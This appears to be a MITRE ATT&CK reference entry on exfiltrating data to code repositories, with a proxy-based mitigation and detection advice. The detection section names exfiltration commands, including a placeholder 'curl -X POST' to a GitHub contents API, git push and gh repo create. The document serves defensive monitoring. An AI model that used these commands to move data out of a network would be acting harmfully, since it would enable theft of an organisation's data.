ID | Name |
---|---|
T1567.001 | Exfiltration to Code Repository |
T1567.002 | Exfiltration to Cloud Storage |
T1567.003 | Exfiltration to Text Storage Sites |
T1567.004 | Exfiltration Over Webhook |
Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.
ID | Mitigation | Description |
---|---|---|
M1021 | Restrict Web-Based Content |
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services. |
ID | Data Source | Data Component | Detects |
---|---|---|---|
DS0017 | Command | Command Execution |
Monitor for execution of commands for repository interaction (git push, curl, gh repo create, git clone), use of API clients (e.g., curl -X POST https://api.github.com/repos/user/repo/contents/), or unusual usage of PowerShell or Bash scripts to automate repository uploads. Analytic 1 - Detecting Repository Uploads via Command Execution
|
DS0022 | File | File Access |
Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel. Analytic 1 - Detecting File Staging for Exfiltration to Code Repositories
|
DS0029 | Network Traffic | Network Traffic Content |
Monitor for outbound network connections to code repository services (e.g., github.com, gitlab.com), web API calls to repository endpoints (POST https://api.github.com/repos/...), or SSH traffic to Git services (git@github.com:username/repo.git). Analytic 1 - Detecting Outbound Connections to Code Repositories
|
Network Traffic Flow |
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for use of code repositories for data exfiltration. |